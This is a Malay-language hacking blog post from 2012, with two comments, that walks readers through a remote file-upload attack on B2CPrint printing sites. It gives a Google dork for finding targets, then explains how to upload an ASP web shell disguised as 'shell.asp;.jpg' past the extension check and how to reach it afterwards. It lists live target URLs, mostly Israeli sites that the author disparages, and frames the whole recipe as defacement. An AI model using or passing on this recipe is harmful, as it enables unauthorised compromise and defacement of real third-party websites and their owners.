B2CPrint - Remote File Upload Vulnerability

Monday, 2 July 2012

B2CPrint - Remote File Upload Vulnerability

By: Afif 04:47 Deface, Exploits 2 comments

Assalamualaikum dan salam sejahtera.Entry kali ini aku nak ajar korang exploit main upload2 lagi.best kan upload2?hahaha.ok JOM!
note : exploit ni banyak web israhell yang terdedah.hehe

1. Mula-mula cari web vuln guna dork :
inurl:upload.asp intext:B2CPrint Online Printing Solutions

2. Buka salah satu web.link dia macam ni :
http://www.Site.il/upload.asp
@
http://www.Site.il/abc/upload.asp

3. Seterusnya masuk kan maklumat2 korang (tipu2 je).
Selepas tu Choose file dan upload :
shell.asp;.jpg
@
shell.asp;.gif

note : upload shell asp (umer rock,spider dll.)

Rujuk gambar :

Lepas tu click SUBMIT!

4. Untuk tengok hasil :
http://www.Site.il/files/images/Sh3ll.asp;.jpg
@
http://www.Site.il/abc/files/images/Sh3ll.asp;.jpg

DONE!

Live Demo :http://www.b2cprintshop.com/upload.asp
http://www.printprint.co.il/upload.asp
http://www.b2cprint.co.il/collage/EN/upload.asp
http://www.spektrum.co.il/upload.asp

ok itu saja untuk kali ini!Happy hacking!
Assalamualaikum

Anonymous3 July 2012 at 04:42
Tak dapat nak tengok bila dah upload =='
ReplyDelete
Replies
Afif5 July 2012 at 08:47
hahaha....cari lagi web lain.. xD
ReplyDelete
Replies

Add comment

Monday, 2 July 2012

B2CPrint - Remote File Upload Vulnerability

2 comments:

Popular Posts

Followers